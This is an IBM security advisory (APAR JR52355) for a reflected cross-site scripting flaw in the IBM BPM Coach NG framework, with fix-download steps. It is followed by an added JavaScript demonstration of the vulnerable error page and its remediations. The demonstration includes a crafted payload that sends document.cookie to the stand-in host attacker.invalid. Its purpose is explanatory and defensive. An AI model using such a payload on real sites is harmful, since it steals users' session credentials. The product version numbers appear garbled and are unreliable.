JR52355: SECURITY APAR CVE-2015-0158 - CROSS-SITE SCRIPTING VULNERABILITY IN IBM BPM COACH NG FRAMEWORK
Closed as program error.
The IBM Business Process Manager (BPM) Coach NG framework is vulnerable to reflected cross-site scripting because user-supplied input is handled improperly. A remote attacker could exploit this vulnerability with a specially crafted URL: once a user clicks the URL, script embedded in it runs in the user's browser within the security context of the hosting website. An attacker could use this to steal the user's cookie-based authentication credentials.

PRODUCTS AFFECTED
IBM Business Process Manager (BPM) Advanced
IBM BPM Standard
IBM BPM Express
No additional information is available.
A fix is available for IBM BPM V22.214.171.124. It replaces a detailed error message, which echoed unescaped user-supplied input back into the page, with a generic error message, so the injected script is no longer reflected. On Fix Central (http://www.ibm.com/support/fixcentral), search for JR52355:
1. Select IBM Business Process Manager with your edition from the product selector, the installed version to the fix pack level, and your platform, and then click Continue.
2. Select APAR or SPR, enter JR52355, and click Continue.
A fix is also available for IBM BPM V126.96.36.199. The fix for this APAR on 188.8.131.52 has been superseded and is included in the cumulative fix for JR52322. To obtain it, follow the instructions above, substituting JR52322 for the APAR ID.
A fix is also available for IBM BPM V184.108.40.206. The fix for this APAR on 220.127.116.11 has been superseded and is included in the cumulative fix for JR52137. To obtain it, follow the instructions above, substituting JR52137 for the APAR ID.
When you download fix packages, also download the readme file for each fix. Review each readme for additional installation instructions and information about the fix.
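The following is an added example, not IBM BPM code and not the APAR fix itself. It models the sink the advisory describes: an error page that reflects a query-string parameter into HTML without escaping, beside the two standard remediations (escape at the sink, or, as the fix does, stop reflecting the input and return a generic message). The host name, URL path, parameter name and function names are all hypothetical, and the payload is constructed for the demonstration.

```javascript
// Added example, not code from IBM BPM. All names here are hypothetical.

// Vulnerable: the "detailed" error message embeds user input verbatim.
function renderErrorVulnerable(coachViewId) {
  return `<html><body><h1>Error</h1>` +
         `<p>Coach view '${coachViewId}' could not be loaded.</p>` +
         `</body></html>`;
}

// Minimal HTML entity escaping, safe for text content and quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// Hardened variant 1: still detailed, but the input is escaped at the sink.
function renderErrorEscaped(coachViewId) {
  return `<html><body><h1>Error</h1>` +
         `<p>Coach view '${escapeHtml(coachViewId)}' could not be loaded.</p>` +
         `</body></html>`;
}

// Hardened variant 2 (the approach the APAR fix takes): a generic message that
// does not reflect the input at all. The detail goes to a server-side log.
function renderErrorGeneric(coachViewId, log = () => {}) {
  log(`coach view load failed: ${JSON.stringify(String(coachViewId))}`);
  return `<html><body><h1>Error</h1>` +
         `<p>The requested view could not be loaded.</p></body></html>`;
}

// Pull the parameter out of the crafted URL the way a server would.
function paramFromUrl(url, name) {
  return new URL(url).searchParams.get(name);
}

// The check a tester makes: does the response carry the payload unchanged?
function reflectsUnescaped(html, payload) {
  return html.includes(payload);
}

// Constructed attack URL: a cookie-stealing script in the query string.
// Host and path are hypothetical (.invalid TLD).
const CRAFTED_URL =
  "https://bpm.example.invalid/teamworks/coach?view=" +
  encodeURIComponent(
    "<script>document.location='https://attacker.invalid/?c='+document.cookie</script>");

// Run the payload through each renderer and report which one reflects it.
function demo() {
  const payload = paramFromUrl(CRAFTED_URL, "view");
  return {
    vulnerable: reflectsUnescaped(renderErrorVulnerable(payload), payload),
    escaped: reflectsUnescaped(renderErrorEscaped(payload), payload),
    generic: reflectsUnescaped(renderErrorGeneric(payload), payload),
  };
}

console.log(demo());
```

Both hardened variants stop the reflection; the generic-message variant additionally avoids leaking internal identifiers, at the cost of moving the diagnostic detail into server logs where an administrator can still see it.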
NoSpecatt / Xsystem